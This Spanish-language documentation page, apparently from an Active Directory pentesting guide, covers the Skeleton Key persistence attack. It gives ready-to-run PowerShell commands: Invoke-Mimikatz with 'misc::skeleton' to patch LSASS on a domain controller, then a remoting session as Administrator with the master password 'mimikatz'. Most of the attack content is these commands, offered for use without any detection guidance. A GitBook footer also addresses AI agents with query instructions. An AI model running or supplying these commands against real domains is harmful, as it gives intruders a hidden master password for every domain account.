> For the complete documentation index, see [llms.txt](https://activedirectory.mrw0l05zyn.cl/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://activedirectory.mrw0l05zyn.cl/persistencia/skeleton-key.md). # Skeleton Key ## Descripción Skeleton Key es un ataque de persistencia que se inyecta en el proceso LSASS (Local Security Authority Subsystem Service) y crea una contraseña maestra que funcionará para cualquier cuenta de dominio. Las contraseñas existentes seguirán funcionando, por lo que es difícil saber si se ha producido este ataque. Al reiniciar el controlador de dominio se eliminarán los cambios realizados por dicho ataque, el cual, para poder perpetrarlo se debe tener una cuenta con privilegios de administrador de dominio. ## Invoke-Mimikatz 1\) Ejecución de ataque Skeleton Key utilizando Invoke-Mimikatz. ```powershell Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName ``` 2\) PowerShell remoting al host administrador del dominio con usuario Administrator y contraseña por defecto mimikatz. ```powershell $UserPassword = ConvertTo-SecureString "mimikatz" -AsPlainText -Force $UserCredential = New-Object System.Management.Automation.PSCredential ("\Administrator", $UserPassword) Enter-PSSession -ComputerName -Credential $UserCredential ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://activedirectory.mrw0l05zyn.cl/persistencia/skeleton-key.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.